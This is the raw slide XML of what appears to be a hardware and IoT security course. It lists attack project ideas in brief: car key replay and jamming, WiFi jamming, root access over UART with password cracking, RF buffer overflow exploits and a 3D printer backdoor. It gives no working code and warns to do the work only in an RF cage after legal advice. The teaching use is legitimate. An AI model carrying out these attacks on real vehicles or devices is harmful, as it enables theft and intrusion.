      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7229E1F-9E82-4C40-B33B-41099E673896}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="3635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22092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0"/>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Effect a glitch on a pin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2204817"/>
            <a:ext cx="11582400" cy="338347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John: TODO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Use power variations or add a resistor/capacitor to affect timing of pulse heights.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A720929-0C38-7A41-B13D-BEBCF902B82F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>125</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2465906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0"/>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Subvert car entry protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2158349"/>
            <a:ext cx="11582400" cy="368827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Record car access signal and replay it.  (See demo for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>HackRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Jam car locking as victim walks away.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Problem: Some car keys have rolling codes, garage doors don’t</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F7C571C-84A9-484C-BB51-D146466ED56D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33040492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39" y="232429"/>
            <a:ext cx="11854137"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weather station link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018308" y="2403955"/>
            <a:ext cx="10155382" cy="3020291"/>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Design one first (see Outline exercises)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You can often intercept unencrypted traffic on the radio which may be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>WiFi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, NFC or HC-12.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD483AC3-8133-B74A-8293-5D5C364ABE49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11263745" y="6356350"/>
            <a:ext cx="652131" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4290245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77" y="136525"/>
            <a:ext cx="11582399" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Interfere with 802.11 control channel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2064326"/>
            <a:ext cx="11582400" cy="4438805"/>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Don’t do this except in an RF cage and AFTER consulting a lawyer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB3413F2-786D-8D4C-8D4E-5894E8AAFD15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11291455" y="6356350"/>
            <a:ext cx="624421" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20619993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13" y="182592"/>
            <a:ext cx="11428597" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Locate 802.11 source with coffee can antennas and an SDR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2355272"/>
            <a:ext cx="11582400" cy="414785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A coffee can is good for 2.4GHz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Pringle cans for 5.2GHz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Just plot power v bearing.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10F175A8-78B1-254B-91B8-11C38B17EB43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11416145" y="6356350"/>
            <a:ext cx="499731" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71975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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828505" y="2076772"/>
            <a:ext cx="10726189" cy="4426359"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Find UART connection</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Wire stubs</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Connect  Badge</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Interrupt U-boot, become super-user.</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Get password file</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Decrypt passwords using John the Ripper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Poke around</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED49511-BB69-6748-B6CE-9C726DA304C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="454204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6525"/>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Induce a buffer overflow via RF</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Hard, John</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Broadcom chips (including those in older Raspberry Pi’s and some android phones) have buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>See Google blog </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This firmware is usually loaded by OS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Rasperian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>) at boot so make sure you have the latest version.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Update this!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{682BDD9F-3797-B24D-8ACF-F572A6AF207A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8862695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09" y="30509"/>
            <a:ext cx="11444982" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Turn RF buffer overflow into an exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373509" y="1855306"/>
            <a:ext cx="11142428" cy="430327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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ghidra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> to change control flow after overflow and download your attack code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Again: In an RF cage after talking to a lawyer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85651B7-9837-C64F-8EAD-6B6C883F43EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>131</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36127194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89139"/>
            <a:ext cx="11224953" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Build a mesh network on IoT devices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426719" y="2421583"/>
            <a:ext cx="11582400" cy="3106381"/>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A secure one.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>There are several existing protocols: research them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFE171B2-E834-9741-A227-0DA597276CB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>132</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30666940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1315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9,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complex physical attacks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8B7D3A7-0C46-494C-BBD3-DA25E823ADAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>133</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1558607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36525"/>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Develop a backdoor for a 3D printer</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CAD review: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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onshape tutorial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"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Slicing and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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g-code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
